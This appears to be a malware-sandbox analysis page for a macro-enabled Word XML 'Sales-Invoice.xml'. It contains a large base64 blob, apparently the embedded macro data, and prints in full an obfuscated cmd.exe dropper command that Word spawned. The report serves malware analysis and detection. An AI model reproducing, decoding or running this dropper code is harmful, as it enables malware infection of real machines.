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 AE8ATwBQAEUATgAAAEAAAAvwBAAAABI0Vng=
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:22 18:27:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:22 18:27:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
15
Malicious processes
6
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs powershell.exe 229.exe no specs 229.exe wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3000"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2672"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4032c:\w4662\q5040\j3357\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
